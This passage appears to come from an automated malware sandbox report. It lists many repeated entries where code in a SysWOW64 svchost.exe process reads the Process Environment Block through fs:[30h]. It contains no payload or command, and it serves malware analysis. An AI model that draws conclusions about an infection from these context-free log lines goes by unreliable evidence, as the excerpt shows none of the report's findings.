            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]2_2_033F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]2_2_033F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6030 mov eax, dword ptr fs:[00000030h]2_2_033C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A020 mov eax, dword ptr fs:[00000030h]2_2_0332A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C020 mov eax, dword ptr fs:[00000030h]2_2_0332C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4000 mov ecx, dword ptr fs:[00000030h]2_2_033B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335C073 mov eax, dword ptr fs:[00000030h]2_2_0335C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332050 mov eax, dword ptr fs:[00000030h]2_2_03332050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6050 mov eax, dword ptr fs:[00000030h]2_2_033B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov eax, dword ptr fs:[00000030h]2_2_033F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov ecx, dword ptr fs:[00000030h]2_2_033F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033280A0 mov eax, dword ptr fs:[00000030h]2_2_033280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C80A8 mov eax, dword ptr fs:[00000030h]2_2_033C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333208A mov eax, dword ptr fs:[00000030h]2_2_0333208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C0F0 mov eax, dword ptr fs:[00000030h]2_2_0332C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033720F0 mov ecx, dword ptr fs:[00000030h]2_2_033720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0332A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033380E9 mov eax, dword ptr fs:[00000030h]2_2_033380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B60E0 mov eax, dword ptr fs:[00000030h]2_2_033B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B20DE mov eax, dword ptr fs:[00000030h]2_2_033B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov ecx, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AC730 mov eax, dword ptr fs:[00000030h]2_2_033AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330710 mov eax, dword ptr fs:[00000030h]2_2_03330710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360710 mov eax, dword ptr fs:[00000030h]2_2_03360710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C700 mov eax, dword ptr fs:[00000030h]2_2_0336C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338770 mov eax, dword ptr fs:[00000030h]2_2_03338770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330750 mov eax, dword ptr fs:[00000030h]2_2_03330750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE75D mov eax, dword ptr fs:[00000030h]2_2_033BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4755 mov eax, dword ptr fs:[00000030h]2_2_033B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov esi, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033307AF mov eax, dword ptr fs:[00000030h]2_2_033307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E47A0 mov eax, dword ptr fs:[00000030h]2_2_033E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D678E mov eax, dword ptr fs:[00000030h]2_2_033D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE7E1 mov eax, dword ptr fs:[00000030h]2_2_033BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333C7C0 mov eax, dword ptr fs:[00000030h]2_2_0333C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B07C3 mov eax, dword ptr fs:[00000030h]2_2_033B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E627 mov eax, dword ptr fs:[00000030h]2_2_0334E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03366620 mov eax, dword ptr fs:[00000030h]2_2_03366620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368620 mov eax, dword ptr fs:[00000030h]2_2_03368620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333262C mov eax, dword ptr fs:[00000030h]2_2_0333262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372619 mov eax, dword ptr fs:[00000030h]2_2_03372619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE609 mov eax, dword ptr fs:[00000030h]2_2_033AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03362674 mov eax, dword ptr fs:[00000030h]2_2_03362674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]2_2_033F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]2_2_033F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]2_2_0336A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]2_2_0336A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334C640 mov eax, dword ptr fs:[00000030h]2_2_0334C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033666B0 mov eax, dword ptr fs:[00000030h]2_2_033666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C6A6 mov eax, dword ptr fs:[00000030h]2_2_0336C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]2_2_03334690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]2_2_03334690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]2_2_033B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]2_2_033B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0336A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A6C7 mov eax, dword ptr fs:[00000030h]2_2_0336A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6500 mov eax, dword ptr fs:[00000030h]2_2_033C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]2_2_03338550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]2_2_03338550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]2_2_033545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]2_2_033545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E59C mov eax, dword ptr fs:[00000030h]2_2_0336E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332582 mov eax, dword ptr fs:[00000030h]2_2_03332582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332582 mov ecx, dword ptr fs:[00000030h]2_2_03332582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03364588 mov eax, dword ptr fs:[00000030h]2_2_03364588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033325E0 mov eax, dword ptr fs:[00000030h]2_2_033325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]2_2_0336C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]2_2_0336C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033365D0 mov eax, dword ptr fs:[00000030h]2_2_033365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]2_2_0336A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]2_2_0336A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]2_2_0336E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]2_2_0336E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A430 mov eax, dword ptr fs:[00000030h]2_2_0336A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C427 mov eax, dword ptr fs:[00000030h]2_2_0332C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC460 mov ecx, dword ptr fs:[00000030h]2_2_033BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA456 mov eax, dword ptr fs:[00000030h]2_2_033EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332645D mov eax, dword ptr fs:[00000030h]2_2_0332645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335245A mov eax, dword ptr fs:[00000030h]2_2_0335245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033644B0 mov ecx, dword ptr fs:[00000030h]2_2_033644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BA4B0 mov eax, dword ptr fs:[00000030h]2_2_033BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033364AB mov eax, dword ptr fs:[00000030h]2_2_033364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA49A mov eax, dword ptr fs:[00000030h]2_2_033EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033304E5 mov ecx, dword ptr fs:[00000030h]2_2_033304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]2_2_0335EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]2_2_0335EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]2_2_033F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]2_2_033F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]2_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]2_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]2_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]2_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404B00 mov eax, dword ptr fs:[00000030h]2_2_03404B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332CB7E mov eax, dword ptr fs:[00000030h]2_2_0332CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328B50 mov eax, dword ptr fs:[00000030h]2_2_03328B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DEB50 mov eax, dword ptr fs:[00000030h]2_2_033DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h]2_2_033E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h]2_2_033E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h]2_2_033C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h]2_2_033C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D8B42 mov eax, dword ptr fs:[00000030h]2_2_033D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FAB40 mov eax, dword ptr fs:[00000030h]2_2_033FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h]2_2_03340BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h]2_2_03340BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h]2_2_033E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h]2_2_033E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]2_2_03338BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]2_2_03338BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]2_2_03338BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EBFC mov eax, dword ptr fs:[00000030h]2_2_0335EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BCBF0 mov eax, dword ptr fs:[00000030h]2_2_033BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DEBD0 mov eax, dword ptr fs:[00000030h]2_2_033DEBD0
